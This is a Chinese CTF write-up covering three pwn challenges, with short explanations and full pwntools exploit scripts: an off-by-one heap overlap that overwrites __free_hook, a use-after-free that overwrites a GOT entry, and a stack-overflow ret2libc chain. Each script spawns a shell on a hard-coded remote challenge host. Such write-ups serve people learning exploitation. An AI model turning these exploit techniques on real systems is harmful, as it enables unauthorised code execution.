星期六刚打完,一共三个pwn,两道难度一般,最后一天的pwn基本凭手速。整理下思路跟exp

heap

堆题:单字节溢出(off-by-one)改写相邻 chunk 的 size 字段,制造堆块重叠;借此泄露 libc 地址,再把 system 写入 __free_hook,最后释放一个内容为 /bin/sh 的 chunk 即可 getshell。

exp

from pwn import *
from LibcSearcher import LibcSearcher
# pwntools session defaults for this exploit: verbose I/O logging, x86-64 target.
context(log_level='debug', arch='amd64')
# Target binary handle (not read anywhere in pwn() below; kept for parity with
# the other exploits).
elf = ELF('heap')
def pwn(ip,port,debug):
    """Exploit 'heap': off-by-one heap overflow -> overlapping chunks ->
    libc leak via the unsorted bin -> __free_hook = system -> free("/bin/sh").

    ip/port: remote target; debug == 1 runs ./heap locally instead.
    NOTE(review): the constants below (the 0x7f4b... delta, the -0x33/-0x40
    deltas from __free_hook, the 0x71/0x91/0xe1 fake sizes) were taken from one
    debugger session against one specific glibc build (no tcache); they must be
    re-derived for any other libc or binary.
    """
    global sh
    global lib
    if(debug == 1):
        p = process('./heap')

    else:
        p = remote(ip,port)
    # Menu wrappers. add() uses sendafter (no newline appended) so the payload
    # bytes -- including the single overflow byte -- land exactly as given.
    def add(size,data):
        p.sendlineafter('Choice :','1')
        p.sendlineafter('size: ',str(size))
        p.sendafter('data: ',str(data))
    def delete(index):
        p.sendlineafter('Choice :','2')
        p.sendlineafter('delete: ',str(index))
    def show():
        p.sendlineafter('Choice :','3')
    # Chunks 0..5 in allocation order (index semantics assumed; confirm with
    # the binary). Chunk 5 holds "/bin/sh\x00".
    add(0x28,'A'*0x28)
    add(0x28,'A')
    add(0x88,'b')
    add(0x18,'A')
    add(0x18,'a')
    add(0x18,'/bin/sh\x00')
    # Chunks 6..9; 8 and 9 also hold "/bin/sh" so that a later free() of one
    # of them passes a "/bin/sh" pointer to __free_hook.
    add(0x18,'a')
    add(0x68,'p')
    add(0x18,'/bin/sh')
    add(0x18,'/bin/sh')
    # Off-by-one: 0x18 data bytes plus one extra byte. For a 0x20 chunk the
    # 0x19th byte is the low byte of the next chunk's size field, so it becomes
    # 0x91 (0x90 | PREV_INUSE) and that chunk now claims to cover its neighbour.
    delete(5)
    add(0x18,'a'*0x18+'\x91')
    delete(6)
    delete(7)
    # Same trick on chunk 0: size byte 0xe1 makes chunk 1 look 0xe0 bytes long
    # (presumably 0x30 + 0x90 + 0x20 = chunks 1, 2 and 3). delete(1) then puts
    # that oversized chunk into the unsorted bin, overlapping live chunks.
    delete(0)
    add(0x28,'A'*0x28+'\xe1')
    delete(1)
    # Re-take the big chunk and overwrite only fd with 'X'*8; show() prints the
    # data up to and past it, so the bytes after the marker are the untouched
    # bk -- a pointer into main_arena.
    add(0xd8,'X'*8)
    show()
    p.recvuntil('XXXXXXXX')
    main_arena=u64(p.recv(6).ljust(8,'\x00'))
    # Debugger-derived delta from the leaked arena pointer to __libc_start_main;
    # only valid for the libc it was measured on.
    _libc_start_main=main_arena-(0x7f4b939f1b78-0x7f4b9364d740)
    print "_libc_start_main=>",hex(_libc_start_main)

    # LibcSearcher matches on the low 12 bits against its local database; an
    # ambiguous match silently yields wrong offsets for everything below.
    libc=LibcSearcher('__libc_start_main',_libc_start_main)
    libcbase_addr=_libc_start_main-libc.dump('__libc_start_main')
    print "libcbase_addr=>",hex(libcbase_addr)
    free_hook_addr=libcbase_addr+libc.dump('__free_hook')
    system_addr=libcbase_addr+libc.dump('system')

    # Fake 0x70-class fastbin chunk (size 0x71) whose fd points at
    # __free_hook-0x33. The size field a fastbin malloc will check lives at
    # __free_hook-0x2b; it is made valid by the unsorted-bin write below.
    payload=p64(0)*3+p64(0x71)+p64(free_hook_addr-0x33)
    add(0x88,payload)
    delete(2)
    # Unsorted-bin attack payload: fake 0x90 chunk with bk = __free_hook-0x40,
    # so that the next malloc writes a main_arena pointer to bk->fd =
    # __free_hook-0x30. Its 0x7f byte (offset 5) then sits at __free_hook-0x2b,
    # i.e. it reads as size 0x7f -> 0x70 after masking, matching the fastbin
    # above. (Arithmetic follows from the constants; confirm in a debugger.)
    payload=p64(0)*5+p64(0x91)+p64(0)+p64(free_hook_addr-0x40)
    # Re-establish the overlap so the payload chunk ends up in the unsorted bin
    # before the fastbin is consumed. The exact layout (0x21 headers at fixed
    # offsets) depends on the binary's allocation pattern and cannot be
    # reconstructed from this script alone.
    add(0x88,p64(0)*11+p64(0x21)+p64(0)*3+p64(0x21))
    delete(2)
    add(0x88,'--')
    delete(0)
    add(0x28,'A'*0x28+'\x91')
    delete(1)
    delete(2)
    add(0x88,payload)
    add(0x88,'1')
    # Two 0x68 requests: the first pops the real fastbin chunk, the second the
    # fake one at __free_hook-0x33. Its user data starts at __free_hook-0x23,
    # so 0x20 + 3 bytes of padding place system_addr exactly on __free_hook.
    add(0x68,'111')
    payload=p64(0)*4+'\x00'*3+p64(system_addr)
    add(0x68,payload)
    # free(chunk 9) -> __free_hook("/bin/sh") -> system("/bin/sh").
    delete(9)
    #gdb.attach(p)
    p.interactive()
if __name__ == "__main__":
    # debug=0: attack the remote instance rather than a local ./heap process.
    pwn(ip='120.55.43.255', port=12240, debug=0)

Internal Chat System

我感觉这道挺难的。漏洞点在于登录进去后可以把自己(当前用户)free 掉,free 之后还能修改自己堆块的内容,于是可以泄露 libc 地址和堆地址;再利用 description 字段伪造堆块,
把 free 后的堆块指向我们伪造的堆块。伪造堆块时记得把 fd 和 bk 指针填好(exp 里 fd 指向堆、bk 指向 main_arena),否则过不了 unsorted bin 的检查。

这样我们就能控制指向堆块的指针:把它改成 GOT 表项的地址(exp 里是 0x603068,应该是 atoi@got),用该表项当前的内容(atoi 地址)作为名字登录,再用 update 把表项覆盖成 system 的地址,最后在菜单里输入 /bin/sh 即可 getshell。

exp

from pwn import *
from LibcSearcher import LibcSearcher
# pwntools session defaults for this exploit: verbose I/O logging, x86-64 target.
context(log_level='debug', arch='amd64')
# Target binary handle (not read anywhere in pwn() below; the GOT address used
# later is hard-coded instead of taken from here).
elf = ELF('inter')

def pwn(ip,port,debug):
    """Exploit 'inter' (Internal Chat System).

    Plan (see the write-up above): free the logged-in user's record through the
    add/delete-friend path while it stays referenced, use the dangling record
    to leak a libc and a heap pointer, forge a chunk inside a description
    buffer, and finally point a user's name buffer at a GOT slot so that
    "update" writes system's address into it.

    ip/port: remote target; debug == 1 runs ./inter locally.
    NOTE(review): the constants (0x603068, the 0x7fe5... and 0x240... deltas,
    0x131 fake sizes, +0x200) come from one debugger session on a non-PIE
    binary with one specific libc; re-derive them for any other build.
    """
    global sh
    global lib
    if(debug == 1):
        p = process('./inter')

    else:
        p = remote(ip,port)
    # Menu wrappers. Main menu: 1 = login, 2 = add user. Logged-in menu:
    # 1 = view, 2 = update, 3 = add/delete friend, 4 = send message, 6 = logout.
    def add(size,name,age,description):
        p.sendlineafter('choice:','2')
        p.sendlineafter('name size:',str(size))
        p.sendlineafter('your name:',name)
        p.sendlineafter('age:',str(age))
        p.sendlineafter('description:',description)
    def login(name):
        p.sendlineafter('choice:','1')
        p.sendlineafter('name:',name)
    def sendfriend(name,title,content):
        p.sendlineafter('choice:','4')
        p.sendlineafter('send a msg to:',name)
        p.sendlineafter('message title:',title)
        p.sendlineafter('Input your content:',content)
    def add_delete(name,aorb):
        p.sendlineafter('choice:','3')
        p.sendlineafter("friend's name:",name)
        p.sendlineafter('friend?(a/d)',aorb)
    def view_fi():
        p.sendlineafter('choice:','1')
    def updete(name,age,description):
        p.sendlineafter('choice:','2')
        p.sendlineafter('your name:',name)
        p.sendlineafter('age:',str(age))
        p.sendlineafter('description:',description)
    def logout():
        p.sendlineafter('choice:','6')
    # Three users. The first description ends in a marker ('ABCDEEEE') that
    # precedes the heap pointer we want printed back; the other two carry a
    # fake chunk size (0x131) at offset 0xb8 for the later forged-chunk step.
    add(0x68,'weeeee',30,'a'*0xf8+'ABCDEEEE')
    payload='\x00'*0xb8+p64(0x131)
    add(0x68,'weei',30,payload)
    payload='\x00'*0xb8+p64(0x131)
    add(0x68,'/bin/sh\x00',30,payload)
    # Log in, then add and delete yourself as a friend: per the write-up this
    # frees the current user's record while the session still uses it (UAF).
    login('weeeee')
    add_delete('weeeee','a')
    add_delete('weeeee','d')
    # view now prints the freed record: "Age:" is followed by 12 hex digits of
    # a libc pointer (presumably a main_arena/unsorted-bin pointer), and a heap
    # pointer follows the marker.
    view_fi()
    p.recvuntil('Age:')
    # Debugger-derived delta from that pointer to __libc_start_main.
    _libc_start_addr=int(p.recv(12),16)-(0x7fe5cdf8cb78-0x7fe5cdbe8740)
    print "_libc_start_addr=>",hex(_libc_start_addr)
    p.recvuntil('ABCDEEEE')
    # NOTE(review): only 4 bytes are read, so this assumes the heap address
    # fits in 32 bits (true for the 0x240... values of the recorded session,
    # i.e. ASLR off; not guaranteed against a remote target). The constant is
    # the leaked pointer's offset from the heap base in that session.
    heap_addr=u64(p.recv(4).ljust(8,'\x00'))-(0x0000000002401680-0x23ff000)
    print "heap_addr=>",hex(heap_addr)
    # Symbol lookup by the low 12 bits of __libc_start_main; an ambiguous
    # database match would silently break every address below.
    libc=LibcSearcher('__libc_start_main',_libc_start_addr)
    libcbase_addr=_libc_start_addr-libc.dump('__libc_start_main')
    system_addr=libcbase_addr+libc.dump('system')
    atoi_addr=libcbase_addr+libc.dump('atoi')
    # Update the freed record: its age field is written with a heap address
    # (heap_addr+0x200), which the program apparently uses as a pointer to a
    # forged chunk living inside a description buffer.
    updete('aa',heap_addr+0x200,'xxx')
    logout()
    login('weei')
    # Forged chunk header: size 0x131, fd = heap pointer, bk = the leaked
    # libc pointer, so the unsorted-bin consistency checks pass when it is
    # freed and reused (as the write-up explains).
    payload='\x00'*0xb8+p64(0x131)+p64(heap_addr)+p64(_libc_start_addr+(0x7fe5cdf8cb78-0x7fe5cdbe8740))
    updete('weei',30,payload)
    logout()
    # New users whose buffers carry 0x603068 -- presumably atoi@got of the
    # non-PIE binary (elf.got['atoi'] would make this self-documenting;
    # confirm against the binary).
    add(0x68,p64(0x603068),30,'a')
    payload='hhh\x00\x00\x00\x00\x00'+p64(0)*10+p64(0x131)+p64(0x603068)
    add(0x128,payload,30,'f')
    # The victim record's name pointer now points at the GOT slot: the slot's
    # current content (atoi's address) is the "name", so login matches, and
    # update writes system's address over it.
    login(p64(atoi_addr))
    updete(p64(system_addr),30,'111')
    # Menu input goes through the patched atoi -> system("/bin/sh").
    p.sendlineafter('choice:','/bin/sh\x00')
    # NOTE(review): gdb.attach is left enabled; it only makes sense with
    # debug == 1 (local process) and will fail or stall against a remote target.
    gdb.attach(p)

    p.interactive()
if __name__ == "__main__":
    # debug=1: runs a local ./inter process (the ip/port are then unused);
    # set debug=0 to target the remote instance.
    pwn(ip='120.55.43.255', port=19812, debug=1)

service_Refueling_System

送分题,拼手速(我没赶上热乎的)。栈溢出:第一轮用 puts 泄露 puts@got 里的地址并返回 main,LibcSearcher 查出 libc 后第二轮 ret2libc 调 system("/bin/sh")。

from pwn import *
from LibcSearcher import *
# pwntools session defaults for this exploit: verbose I/O logging, x86-64 target.
context(log_level='debug', arch='amd64')
elf = ELF('self')
# NOTE(review): despite its name this holds puts@GOT (the address the first
# ROP stage leaks), not __libc_start_main; kept because pwn() uses this name.
_libc_start_main = elf.got['puts']
puts_plt = elf.plt['puts']
# Return target after each ROP stage; main of the (non-PIE) binary --
# confirm against the binary.
main_addr = 0x0400EAA
# Process/remote handle, assigned inside pwn().
p = 0
def pwn(ip,port,debug):
    """Exploit 'self' (service_Refueling_System): stack overflow in the
    "Gas Card ID" input -> ret2plt leak of puts -> ret2libc system("/bin/sh").

    ip/port: remote target; debug == 1 runs ./self locally.
    Stores the connection in the module-level global p.
    """
    global p
    if(debug == 1):
        p = process('./self')

    else:
        p = remote(ip,port)
    #sleep(5)
    #gdb.attach(p)
    p.sendlineafter('Do you want to refuel?(y/n)\n','y')
    p.recvuntil('Plz input your Gas Card ID :\n')
    # Frame layout (from the binary; not recoverable from this script):
    # 0x18 bytes of filler, two 32-bit values (26214, 9011) that presumably
    # satisfy a check on the card ID so the vulnerable path returns normally,
    # 8 bytes for the saved rbp, then the chain. 0x400fb3 is used as a
    # one-argument gadget (pop rdi; ret, presumably): puts(puts@got), then
    # back into main for a second round.
    payload="A"*(0x20-8)+p32(26214)+p32(9011)+"A"*8+p64(0x400fb3)+p64(_libc_start_main)+p64(puts_plt)+p64(main_addr)
    p.sendline(payload)
    p.sendlineafter('How mang gas do you want?(L)\n','L')
    p.recvuntil('Finish! your car is full of gas\n')
    # pause() waits for the operator; fine for an interactive run, but it
    # blocks an unattended one.
    pause()
    #print "recv=>",p.recv()

    # NOTE(review): [4:10] assumes a single recv() returns exactly 4 bytes
    # before the 6 significant bytes of the leaked pointer. A split read or a
    # different prefix silently yields a wrong address; anchoring on the known
    # prefix with recvuntil would be more robust.
    puts_addr=u64(p.recv()[4:10].ljust(8,'\x00'))
    print "puts_addr=>",hex(puts_addr)
    # Identify libc by puts' low 12 bits (local database; ambiguous matches
    # give wrong offsets for system and "/bin/sh").
    libc=LibcSearcher('puts',puts_addr)
    libcbase_addr=puts_addr-libc.dump('puts')
    system_addr=libcbase_addr+libc.dump('system')
    binsh_addr=libcbase_addr+libc.dump('str_bin_sh')
    # Second round through main: same overflow, chain is now
    # pop rdi <- "/bin/sh" ; system ; main.
    p.sendlineafter('Do you want to refuel?(y/n)\n','y')
    p.recvuntil('Plz input your Gas Card ID :\n')
    payload="A"*(0x20-8)+p32(26214)+p32(9011)+"A"*8+p64(0x400fb3)+p64(binsh_addr)+p64(system_addr)+p64(main_addr)
    p.sendline(payload)
    p.sendlineafter('How mang gas do you want?(L)\n','L')
    # NOTE(review): this pattern has a leading space, unlike the first
    # recvuntil above; if the program does not print that space this call
    # never returns. Either form, but the same one, in both places.
    p.recvuntil(' Finish! your car is full of gas\n')
    p.interactive()
if __name__ == "__main__":
    # debug=0: attack the remote instance rather than a local ./self process.
    pwn(ip='120.55.43.255', port=23810, debug=0)